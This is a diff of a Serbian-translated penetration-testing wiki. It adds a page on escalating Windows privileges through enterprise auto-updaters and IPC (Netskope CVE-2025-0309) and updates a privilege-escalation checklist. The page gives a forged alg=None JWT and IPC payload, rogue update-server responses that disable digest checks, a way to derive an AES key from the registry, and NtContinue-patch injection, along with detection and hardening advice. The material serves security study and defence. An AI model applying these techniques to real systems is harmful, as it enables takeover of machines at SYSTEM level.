Translated ['src/windows-hardening/checklist-windows-privilege-escalatio

src/SUMMARY.md

@@ -236,6 +236,7 @@
 - [Authentication Credentials Uac And Efs](windows-hardening/authentication-credentials-uac-and-efs.md)
 - [Checklist - Local Windows Privilege Escalation](windows-hardening/checklist-windows-privilege-escalation.md)
 - [Windows Local Privilege Escalation](windows-hardening/windows-local-privilege-escalation/README.md)
+  - [Abusing Auto Updaters And Ipc](windows-hardening/windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.md)
   - [Arbitrary Kernel Rw Token Theft](windows-hardening/windows-local-privilege-escalation/arbitrary-kernel-rw-token-theft.md)
   - [Dll Hijacking](windows-hardening/windows-local-privilege-escalation/dll-hijacking.md)
   - [Abusing Tokens](windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md)

src/windows-hardening/checklist-windows-privilege-escalation.md

@@ -1,114 +1,115 @@
-# Lista - Lokalna eskalacija privilegija na Windows-u
+# Kontrolna lista - Local Windows Privilege Escalation
 
 {{#include ../banners/hacktricks-training.md}}
 
-### **Najbolji alat za pronalaženje vektora lokalne eskalacije privilegija na Windows-u:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)
+### **Najbolji alat za traženje Windows local privilege escalation vectors:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)
 
-### [Informacije o sistemu](windows-local-privilege-escalation/index.html#system-info)
+### [System Info](windows-local-privilege-escalation/index.html#system-info)
 
-- [ ] Pribavite [**informacije o sistemu**](windows-local-privilege-escalation/index.html#system-info)
-- [ ] Pretražujte **kernel** [**eksploite koristeći skripte**](windows-local-privilege-escalation/index.html#version-exploits)
-- [ ] Koristite **Google za pretragu** kernel **eksploita**
-- [ ] Koristite **searchsploit za pretragu** kernel **eksploita**
+- [ ] Pribavite [**System information**](windows-local-privilege-escalation/index.html#system-info)
+- [ ] Pretražite **kernel** [**exploits using scripts**](windows-local-privilege-escalation/index.html#version-exploits)
+- [ ] Koristite **Google to search** for kernel **exploits**
+- [ ] Koristite **searchsploit to search** for kernel **exploits**
 - [ ] Zanimljive informacije u [**env vars**](windows-local-privilege-escalation/index.html#environment)?
-- [ ] Lozinke u [**PowerShell istoriji**](windows-local-privilege-escalation/index.html#powershell-history)?
-- [ ] Zanimljive informacije u [**Internet podešavanjima**](windows-local-privilege-escalation/index.html#internet-settings)?
-- [ ] [**Diskovi**](windows-local-privilege-escalation/index.html#drives)?
-- [ ] [**WSUS eksploatacija**](windows-local-privilege-escalation/index.html#wsus)?
+- [ ] Lozinke u [**PowerShell history**](windows-local-privilege-escalation/index.html#powershell-history)?
+- [ ] Zanimljive informacije u [**Internet settings**](windows-local-privilege-escalation/index.html#internet-settings)?
+- [ ] [**Drives**](windows-local-privilege-escalation/index.html#drives)?
+- [ ] [**WSUS exploit**](windows-local-privilege-escalation/index.html#wsus)?
+- [ ] [**Third-party agent auto-updaters / IPC abuse**](windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.md)
 - [ ] [**AlwaysInstallElevated**](windows-local-privilege-escalation/index.html#alwaysinstallelevated)?
 
-### [Logovanje/AV enumeracija](windows-local-privilege-escalation/index.html#enumeration)
+### [Logging/AV enumeration](windows-local-privilege-escalation/index.html#enumeration)
 
-- [ ] Proverite [**Audit** ](windows-local-privilege-escalation/index.html#audit-settings) i [**WEF** ](windows-local-privilege-escalation/index.html#wef) podešavanja
+- [ ] Proverite [**Audit** ](windows-local-privilege-escalation/index.html#audit-settings)i [**WEF** ](windows-local-privilege-escalation/index.html#wef)settings
 - [ ] Proverite [**LAPS**](windows-local-privilege-escalation/index.html#laps)
-- [ ] Proverite da li je [**WDigest** ](windows-local-privilege-escalation/index.html#wdigest) aktivan
-- [ ] [**LSA zaštita**](windows-local-privilege-escalation/index.html#lsa-protection)?
+- [ ] Proverite da li je [**WDigest** ](windows-local-privilege-escalation/index.html#wdigest)aktiviran
+- [ ] [**LSA Protection**](windows-local-privilege-escalation/index.html#lsa-protection)?
 - [ ] [**Credentials Guard**](windows-local-privilege-escalation/index.html#credentials-guard)[?](windows-local-privilege-escalation/index.html#cached-credentials)
-- [ ] [**Keširane kredencijale**](windows-local-privilege-escalation/index.html#cached-credentials)?
+- [ ] [**Cached Credentials**](windows-local-privilege-escalation/index.html#cached-credentials)?
 - [ ] Proverite da li postoji neki [**AV**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/windows-av-bypass/README.md)
-- [ ] [**AppLocker politika**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/authentication-credentials-uac-and-efs/README.md#applocker-policy)?
+- [ ] [**AppLocker Policy**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/authentication-credentials-uac-and-efs/README.md#applocker-policy)?
 - [ ] [**UAC**](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/authentication-credentials-uac-and-efs/uac-user-account-control/README.md)
-- [ ] [**Korisničke privilegije**](windows-local-privilege-escalation/index.html#users-and-groups)
-- [ ] Proverite [**trenutne** korisničke **privilegije**](windows-local-privilege-escalation/index.html#users-and-groups)
-- [ ] Da li ste [**član neke privilegovane grupe**](windows-local-privilege-escalation/index.html#privileged-groups)?
-- [ ] Proverite da li imate [neki od ovih tokena aktiviranih](windows-local-privilege-escalation/index.html#token-manipulation): **SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege** ?
-- [ ] [**Sesije korisnika**](windows-local-privilege-escalation/index.html#logged-users-sessions)?
-- [ ] Proverite [**korisničke domove**](windows-local-privilege-escalation/index.html#home-folders) (pristup?)
-- [ ] Proverite [**Politiku lozinki**](windows-local-privilege-escalation/index.html#password-policy)
-- [ ] Šta je [**unutar Clipboard-a**](windows-local-privilege-escalation/index.html#get-the-content-of-the-clipboard)?
+- [ ] [**User Privileges**](windows-local-privilege-escalation/index.html#users-and-groups)
+- [ ] Proverite [**current** user **privileges**](windows-local-privilege-escalation/index.html#users-and-groups)
+- [ ] Da li ste [**member of any privileged group**](windows-local-privilege-escalation/index.html#privileged-groups)?
+- [ ] Proverite da li imate [any of these tokens enabled](windows-local-privilege-escalation/index.html#token-manipulation): **SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege** ?
+- [ ] [**Users Sessions**](windows-local-privilege-escalation/index.html#logged-users-sessions)?
+- [ ] Proverite[ **users homes**](windows-local-privilege-escalation/index.html#home-folders) (pristup?)
+- [ ] Proverite [**Password Policy**](windows-local-privilege-escalation/index.html#password-policy)
+- [ ] Šta je[ **inside the Clipboard**](windows-local-privilege-escalation/index.html#get-the-content-of-the-clipboard)?
 
-### [Mreža](windows-local-privilege-escalation/index.html#network)
+### [Network](windows-local-privilege-escalation/index.html#network)
 
-- [ ] Proverite **trenutne** [**mrežne** **informacije**](windows-local-privilege-escalation/index.html#network)
-- [ ] Proverite **sakrivene lokalne usluge** ograničene na spoljašnjost
+- [ ] Proverite **current** [**network** **information**](windows-local-privilege-escalation/index.html#network)
+- [ ] Proverite skrivene lokalne servise ograničene na spolja
 
-### [Pokrenuti procesi](windows-local-privilege-escalation/index.html#running-processes)
+### [Running Processes](windows-local-privilege-escalation/index.html#running-processes)
 
-- [ ] Binarne datoteke procesa [**dozvole za datoteke i foldere**](windows-local-privilege-escalation/index.html#file-and-folder-permissions)
-- [ ] [**Rudarenje lozinki iz memorije**](windows-local-privilege-escalation/index.html#memory-password-mining)
-- [ ] [**Neosigurane GUI aplikacije**](windows-local-privilege-escalation/index.html#insecure-gui-apps)
-- [ ] Ukrao kredencijale sa **zanimljivih procesa** putem `ProcDump.exe` ? (firefox, chrome, itd ...)
+- [ ] Binarni fajlovi procesa [**file and folders permissions**](windows-local-privilege-escalation/index.html#file-and-folder-permissions)
+- [ ] [**Memory Password mining**](windows-local-privilege-escalation/index.html#memory-password-mining)
+- [ ] [**Insecure GUI apps**](windows-local-privilege-escalation/index.html#insecure-gui-apps)
+- [ ] Ukradite kredencijale sa **interesting processes** pomoću `ProcDump.exe` ? (firefox, chrome, etc ...)
 
-### [Usluge](windows-local-privilege-escalation/index.html#services)
+### [Services](windows-local-privilege-escalation/index.html#services)
 
-- [ ] [Možete li **modifikovati neku uslugu**?](windows-local-privilege-escalation/index.html#permissions)
-- [ ] [Možete li **modifikovati** **binarne** datoteke koje **izvršava** neka **usluga**?](windows-local-privilege-escalation/index.html#modify-service-binary-path)
-- [ ] [Možete li **modifikovati** **registru** bilo koje **usluge**?](windows-local-privilege-escalation/index.html#services-registry-modify-permissions)
-- [ ] [Možete li iskoristiti bilo koju **necitiranu uslugu** binarnu **putanju**?](windows-local-privilege-escalation/index.html#unquoted-service-paths)
+- [ ] Možete li **modify any service**? (windows-local-privilege-escalation/index.html#permissions)
+- [ ] Možete li **modify** the **binary** that is **executed** by any **service**? (windows-local-privilege-escalation/index.html#modify-service-binary-path)
+- [ ] Možete li **modify** the **registry** of any **service**? (windows-local-privilege-escalation/index.html#services-registry-modify-permissions)
+- [ ] Možete li iskoristiti bilo koji **unquoted service** binary **path**? (windows-local-privilege-escalation/index.html#unquoted-service-paths)
 
-### [**Aplikacije**](windows-local-privilege-escalation/index.html#applications)
+### [**Applications**](windows-local-privilege-escalation/index.html#applications)
 
-- [ ] **Pisanje** [**dozvola na instaliranim aplikacijama**](windows-local-privilege-escalation/index.html#write-permissions)
-- [ ] [**Aplikacije pri pokretanju**](windows-local-privilege-escalation/index.html#run-at-startup)
-- [ ] **Ranljive** [**drajvere**](windows-local-privilege-escalation/index.html#drivers)
+- [ ] **Write** [**permissions on installed applications**](windows-local-privilege-escalation/index.html#write-permissions)
+- [ ] [**Startup Applications**](windows-local-privilege-escalation/index.html#run-at-startup)
+- [ ] **Vulnerable** [**Drivers**](windows-local-privilege-escalation/index.html#drivers)
 
 ### [DLL Hijacking](windows-local-privilege-escalation/index.html#path-dll-hijacking)
 
-- [ ] Možete li **pisati u bilo koju fasciklu unutar PATH-a**?
-- [ ] Da li postoji neka poznata binarna datoteka usluge koja **pokušava da učita neku nepostojeću DLL**?
-- [ ] Možete li **pisati** u bilo koju **fasciklu binarnih datoteka**?
+- [ ] Možete li **write in any folder inside PATH**?
+- [ ] Postoji li neki poznat service binary koji pokušava da učita neki nepostojeći DLL?
+- [ ] Možete li **write** u bilo koji **binaries folder**?
 
-### [Mreža](windows-local-privilege-escalation/index.html#network)
+### [Network](windows-local-privilege-escalation/index.html#network)
 
-- [ ] Enumerišite mrežu (deljenja, interfejsi, rute, susedi, ...)
-- [ ] Obratite posebnu pažnju na mrežne usluge koje slušaju na localhost (127.0.0.1)
+- [ ] Enumerišite mrežu (shares, interfaces, routes, neighbours, ...)
+- [ ] Obratite posebnu pažnju na network servise koji slušaju na localhost (127.0.0.1)
 
-### [Windows kredencijali](windows-local-privilege-escalation/index.html#windows-credentials)
+### [Windows Credentials](windows-local-privilege-escalation/index.html#windows-credentials)
 
-- [ ] [**Winlogon** ](windows-local-privilege-escalation/index.html#winlogon-credentials) kredencijali
-- [ ] [**Windows Vault**](windows-local-privilege-escalation/index.html#credentials-manager-windows-vault) kredencijali koje možete koristiti?
-- [ ] Zanimljive [**DPAPI kredencijale**](windows-local-privilege-escalation/index.html#dpapi)?
-- [ ] Lozinke sa sačuvanih [**Wifi mreža**](windows-local-privilege-escalation/index.html#wifi)?
-- [ ] Zanimljive informacije u [**sačuvanim RDP vezama**](windows-local-privilege-escalation/index.html#saved-rdp-connections)?
-- [ ] Lozinke u [**nedavno pokrenutim komandama**](windows-local-privilege-escalation/index.html#recently-run-commands)?
-- [ ] [**Menadžer kredencijala za daljinsku radnu površinu**](windows-local-privilege-escalation/index.html#remote-desktop-credential-manager) lozinke?
-- [ ] [**AppCmd.exe** postoji](windows-local-privilege-escalation/index.html#appcmd-exe)? Kredencijali?
+- [ ] [**Winlogon** ](windows-local-privilege-escalation/index.html#winlogon-credentials)credentials
+- [ ] [**Windows Vault**](windows-local-privilege-escalation/index.html#credentials-manager-windows-vault) credentials koje biste mogli iskoristiti?
+- [ ] Zanimljivi [**DPAPI credentials**](windows-local-privilege-escalation/index.html#dpapi)?
+- [ ] Lozinke sačuvanih [**Wifi networks**](windows-local-privilege-escalation/index.html#wifi)?
+- [ ] Zanimljive informacije u [**saved RDP Connections**](windows-local-privilege-escalation/index.html#saved-rdp-connections)?
+- [ ] Lozinke u [**recently run commands**](windows-local-privilege-escalation/index.html#recently-run-commands)?
+- [ ] [**Remote Desktop Credentials Manager**](windows-local-privilege-escalation/index.html#remote-desktop-credential-manager) lozinke?
+- [ ] [**AppCmd.exe** exists](windows-local-privilege-escalation/index.html#appcmd-exe)? Credentials?
 - [ ] [**SCClient.exe**](windows-local-privilege-escalation/index.html#scclient-sccm)? DLL Side Loading?
 
-### [Datoteke i registri (Kredencijali)](windows-local-privilege-escalation/index.html#files-and-registry-credentials)
+### [Files and Registry (Credentials)](windows-local-privilege-escalation/index.html#files-and-registry-credentials)
 
-- [ ] **Putty:** [**Kredencijali**](windows-local-privilege-escalation/index.html#putty-creds) **i** [**SSH host ključevi**](windows-local-privilege-escalation/index.html#putty-ssh-host-keys)
-- [ ] [**SSH ključevi u registru**](windows-local-privilege-escalation/index.html#ssh-keys-in-registry)?
-- [ ] Lozinke u [**nepridruženim datotekama**](windows-local-privilege-escalation/index.html#unattended-files)?
-- [ ] Da li postoji neki [**SAM & SYSTEM**](windows-local-privilege-escalation/index.html#sam-and-system-backups) backup?
-- [ ] [**Cloud kredencijali**](windows-local-privilege-escalation/index.html#cloud-credentials)?
-- [ ] [**McAfee SiteList.xml**](windows-local-privilege-escalation/index.html#mcafee-sitelist.xml) datoteka?
-- [ ] [**Keširana GPP lozinka**](windows-local-privilege-escalation/index.html#cached-gpp-pasword)?
-- [ ] Lozinka u [**IIS Web config datoteci**](windows-local-privilege-escalation/index.html#iis-web-config)?
-- [ ] Zanimljive informacije u [**web** **logovima**](windows-local-privilege-escalation/index.html#logs)?
-- [ ] Da li želite da [**tražite kredencijale**](windows-local-privilege-escalation/index.html#ask-for-credentials) od korisnika?
-- [ ] Zanimljive [**datoteke unutar Korpe za otpatke**](windows-local-privilege-escalation/index.html#credentials-in-the-recyclebin)?
-- [ ] Druge [**registri koji sadrže kredencijale**](windows-local-privilege-escalation/index.html#inside-the-registry)?
-- [ ] Unutar [**podataka pretraživača**](windows-local-privilege-escalation/index.html#browsers-history) (dbs, istorija, obeleživači, ...)?
-- [ ] [**Opšta pretraga lozinki**](windows-local-privilege-escalation/index.html#generic-password-search-in-files-and-registry) u datotekama i registru
-- [ ] [**Alati**](windows-local-privilege-escalation/index.html#tools-that-search-for-passwords) za automatsku pretragu lozinki
+- [ ] **Putty:** [**Creds**](windows-local-privilege-escalation/index.html#putty-creds) **and** [**SSH host keys**](windows-local-privilege-escalation/index.html#putty-ssh-host-keys)
+- [ ] [**SSH keys in registry**](windows-local-privilege-escalation/index.html#ssh-keys-in-registry)?
+- [ ] Lozinke u [**unattended files**](windows-local-privilege-escalation/index.html#unattended-files)?
+- [ ] Bilo koji [**SAM & SYSTEM**](windows-local-privilege-escalation/index.html#sam-and-system-backups) backup?
+- [ ] [**Cloud credentials**](windows-local-privilege-escalation/index.html#cloud-credentials)?
+- [ ] [**McAfee SiteList.xml**](windows-local-privilege-escalation/index.html#mcafee-sitelist.xml) fajl?
+- [ ] [**Cached GPP Password**](windows-local-privilege-escalation/index.html#cached-gpp-pasword)?
+- [ ] Lozinka u [**IIS Web config file**](windows-local-privilege-escalation/index.html#iis-web-config)?
+- [ ] Zanimljive informacije u [**web** **logs**](windows-local-privilege-escalation/index.html#logs)?
+- [ ] Da li želite da [**ask for credentials**](windows-local-privilege-escalation/index.html#ask-for-credentials) od korisnika?
+- [ ] Zanimljivi [**files inside the Recycle Bin**](windows-local-privilege-escalation/index.html#credentials-in-the-recyclebin)?
+- [ ] Ostali [**registry containing credentials**](windows-local-privilege-escalation/index.html#inside-the-registry)?
+- [ ] Unutar [**Browser data**](windows-local-privilege-escalation/index.html#browsers-history) (dbs, history, bookmarks, ...)?
+- [ ] [**Generic password search**](windows-local-privilege-escalation/index.html#generic-password-search-in-files-and-registry) u fajlovima i registry-ju
+- [ ] [**Tools**](windows-local-privilege-escalation/index.html#tools-that-search-for-passwords) za automatsko traženje lozinki
 
-### [Procureni handleri](windows-local-privilege-escalation/index.html#leaked-handlers)
+### [Leaked Handlers](windows-local-privilege-escalation/index.html#leaked-handlers)
 
-- [ ] Da li imate pristup bilo kojem handleru procesa koji pokreće administrator?
+- [ ] Imate li pristup bilo kojem handleru procesa koji je pokrenut od strane administratora?
 
-### [Impersonacija klijenta cevi](windows-local-privilege-escalation/index.html#named-pipe-client-impersonation)
+### [Pipe Client Impersonation](windows-local-privilege-escalation/index.html#named-pipe-client-impersonation)
 
-- [ ] Proverite da li možete da to zloupotrebite
+- [ ] Proverite da li možete da to iskoristite
 
 {{#include ../banners/hacktricks-training.md}}

src/windows-hardening/windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.md

@@ -0,0 +1,123 @@
+# Zloupotreba Enterprise Auto-Updaters i privilegisanog IPC-a (npr. Netskope stAgentSvc)
+
+{{#include ../../banners/hacktricks-training.md}}
+
+Ova stranica generalizuje klasu Windows lokalnih lanaca za eskalaciju privilegija pronađenih u enterprise endpoint agentima i updaterima koji izlažu low‑friction IPC površinu i privilegovani tok ažuriranja. Reprezentativan primer je Netskope Client for Windows < R129 (CVE-2025-0309), gde korisnik sa niskim privilegijama može naterati enrollment na server pod kontrolom napadača i zatim isporučiti zlonamerni MSI koji servis pokrenut kao SYSTEM instalira.
+
+Ključne ideje koje možete ponovo iskoristiti protiv sličnih proizvoda:
+- Zloupotrebite localhost IPC privilegisanog servisa da prisilite ponovni enrollment ili rekonfiguraciju na server napadača.
+- Implementirajte vendorove update endpoint-e, dostavite lažni Trusted Root CA, i usmerite updater na zlonamerni „signed“ paket.
+- Izbegnite slabe provere potpisivača (CN allow‑lists), opciona digest zastavice, i popustljiva MSI svojstva.
+- Ako je IPC „encrypted“, izvedite key/IV iz world‑readable identifikatora mašine smeštenih u registry.
+- Ako servis ograničava pozivaoce po image path/process name, injektujte u proces sa liste dozvoljenih ili spawn-ujte jedan u suspended stanju i bootstrap-ujte svoj DLL putem minimalnog patch-a thread‑contexta.
+
+---
+## 1) Prisiljavanje enrollmenta na server napadača preko localhost IPC-a
+
+Mnogi agenti dolaze sa user‑mode UI procesom koji komunicira sa SYSTEM servisom preko localhost TCP koristeći JSON.
+
+Primećeno u Netskope:
+- UI: stAgentUI (low integrity) ↔ Service: stAgentSvc (SYSTEM)
+- IPC command ID 148: IDP_USER_PROVISIONING_WITH_TOKEN
+
+Tok eksploatacije:
+1) Sastavite JWT enrollment token čiji claims kontrolišu backend host (npr. AddonUrl). Koristite alg=None tako da nije potreban potpis.
+2) Pošaljite IPC poruku koja poziva provisioning command sa vašim JWT i tenant name:
+```json
+{
+"148": {
+"idpTokenValue": "<JWT with AddonUrl=attacker-host; header alg=None>",
+"tenantName": "TestOrg"
+}
+}
+```
+3) Servis počinje da upućuje zahteve vašem zlonamernom serveru za enrollment/config, npr.:
+- /v1/externalhost?service=enrollment
+- /config/user/getbrandingbyemail
+
+Notes:
+- Ako je caller verification zasnovana na path/name‑based, pošaljite zahtev iz allow‑listed vendor binary (see §4).
+
+---
+## 2) Otmica update kanala da bi se pokrenuo kod kao SYSTEM
+
+Kada klijent razgovara sa vašim serverom, implementirajte očekivane endpoints i usmerite ga na attacker MSI. Tipičan redosled:
+
+1) /v2/config/org/clientconfig → Vratite JSON config sa veoma kratkim updater intervalom, npr.:
+```json
+{
+"clientUpdate": { "updateIntervalInMin": 1 },
+"check_msi_digest": false
+}
+```
+2) /config/ca/cert → Vraća PEM CA сертификат. Servis ga instalira u Local Machine Trusted Root store.
+3) /v2/checkupdate → Dostavi metapodatke koji upućuju na maliciozni MSI i lažnu verziju.
+
+Zaobilaženje uobičajenih provera viđenih u stvarnom svetu:
+- Signer CN allow‑list: servis može samo proveravati da li Subject CN odgovara “netSkope Inc” ili “Netskope, Inc.”. Vaš rogue CA može izstaviti leaf sertifikat sa tim CN i potpisati MSI.
+- CERT_DIGEST property: uključite benigni MSI property pod imenom CERT_DIGEST. Nema primene pri instalaciji.
+- Optional digest enforcement: konfig flag (npr. check_msi_digest=false) onemogućava dodatnu kriptografsku validaciju.
+
+Rezultat: SYSTEM servis instalira vaš MSI iz
+C:\ProgramData\Netskope\stAgent\data\*.msi
+i izvršava proizvoljni kod kao NT AUTHORITY\SYSTEM.
+
+---
+## 3) Forging encrypted IPC requests (when present)
+
+Od R127, Netskope je umotao IPC JSON u polje encryptData koje liči na Base64. Reverzno inženjerstvo je pokazalo AES sa ključem/IV izvedenim iz vrednosti u registry-ju koje su čitljive bilo kom korisniku:
+- Key = HKLM\SOFTWARE\NetSkope\Provisioning\nsdeviceidnew
+- IV  = HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductID
+
+Napadači mogu reprodukovati enkripciju i poslati validne enkriptovane komande iz standardnog korisničkog konteksta. Opšti savet: ako agent iznenada „šifruje“ svoj IPC, tražite device ID-e, product GUID-ove, install ID-e pod HKLM kao materijal za derivaciju.
+
+---
+## 4) Bypassing IPC caller allow‑lists (path/name checks)
+
+Neki servisi pokušavaju da autentifikuju peer rešavanjem PID-a TCP konekcije i poređenjem image path/name sa allow‑listovanim vendor binarima smeštenim pod Program Files (npr. stagentui.exe, bwansvc.exe, epdlp.exe).
+
+Dva praktična zaobilaženja:
+- DLL injection u allow‑listovani proces (npr. nsdiag.exe) i proxy-ovanje IPC iznutra.
+- Pokrenuti allow‑listovani binarni fajl u suspended stanju i bootstrap-ovati svoj proxy DLL bez CreateRemoteThread (vidi §5) da biste zadovoljili driver‑enforced tamper pravila.
+
+---
+## 5) Tamper‑protection friendly injection: suspended process + NtContinue patch
+
+Proizvodi često isporučuju minifilter/OB callbacks driver (npr. Stadrv) koji uklanja opasna prava sa handle-ova za zaštićene procese:
+- Process: uklanja PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_READ, PROCESS_DUP_HANDLE, PROCESS_SUSPEND_RESUME
+- Thread: ograničava na THREAD_GET_CONTEXT, THREAD_QUERY_LIMITED_INFORMATION, THREAD_RESUME, SYNCHRONIZE
+
+Pouzdan user‑mode loader koji poštuje ta ograničenja:
+1) CreateProcess vendor binar‑a sa CREATE_SUSPENDED.
+2) Nabavite handle-ove kojih ste još uvek sposobni: PROCESS_VM_WRITE | PROCESS_VM_OPERATION na procesu, i thread handle sa THREAD_GET_CONTEXT/THREAD_SET_CONTEXT (ili samo THREAD_RESUME ako patch-ujete kod na poznatom RIP).
+3) Overwrite ntdll!NtContinue (ili drugi rani, garantovano mapiran thunk) sa malim stub-om koji poziva LoadLibraryW na putanju vaše DLL, zatim se vraća.
+4) ResumeThread da pokrenete vaš stub u procesu, koji učita vašu DLL.
+
+Pošto nikada niste koristili PROCESS_CREATE_THREAD ili PROCESS_SUSPEND_RESUME na već‑zaštićenom procesu (vi ste ga kreirali), driver-ova politika je zadovoljena.
+
+---
+## 6) Practical tooling
+- NachoVPN (Netskope plugin) automatizuje rogue CA, potpisivanje malicioznog MSI-a i servisira potrebne endpoint-e: /v2/config/org/clientconfig, /config/ca/cert, /v2/checkupdate.
+- UpSkope je custom IPC client koji gradi proizvoljne (opciono AES‑šifrovane) IPC poruke i uključuje suspended‑process injection da poreklo bude iz allow‑listovanog binarnog fajla.
+
+---
+## 7) Detection opportunities (blue team)
+- Monitorisati dodatke u Local Machine Trusted Root. Sysmon + registry‑mod eventing (vidi SpecterOps guidance) dobro rade.
+- Flagovati MSI izvršenja pokrenuta od strane agentovog servisa iz putanja kao što su C:\ProgramData\<vendor>\<agent>\data\*.msi.
+- Pregledati agent logove za neočekivane enrollment hostove/tenant-e, npr.: C:\ProgramData\netskope\stagent\logs\nsdebuglog.log – tražiti addonUrl / tenant anomalije i provisioning msg 148.
+- Alertovati na localhost IPC klijente koji nisu očekivani signed binari, ili koji potiču iz neuobičajenih child process tree-ova.
+
+---
+## Hardening tips for vendors
+- Bind enrollment/update hostove na strogu allow‑listu; odbijajte nepouzdane domene u clientcode-u.
+- Autentifikujte IPC peer‑ove OS primitivima (ALPC security, named‑pipe SIDs) umesto provera image path/name.
+- Držite tajni materijal van world‑readable HKLM; ako IPC mora biti enkriptovan, izvedite ključeve iz zaštićenih secret-a ili pregovarajte preko autentifikovanih kanala.
+- Tretirajte updater kao supply‑chain površinu: zahtevajte pun lanac do trusted CA koju kontrolišete, verifikujte potpis paketa prema pinned ključevima i fail‑closed ako je validacija onemogućena u konfiguraciji.
+
+## References
+- [Advisory – Netskope Client for Windows – Local Privilege Escalation via Rogue Server (CVE-2025-0309)](https://blog.amberwolf.com/blog/2025/august/advisory---netskope-client-for-windows---local-privilege-escalation-via-rogue-server/)
+- [NachoVPN – Netskope plugin](https://github.com/AmberWolfCyber/NachoVPN)
+- [UpSkope – Netskope IPC client/exploit](https://github.com/AmberWolfCyber/UpSkope)
+- [NVD – CVE-2025-0309](https://nvd.nist.gov/vuln/detail/CVE-2025-0309)
+
+{{#include ../../banners/hacktricks-training.md}}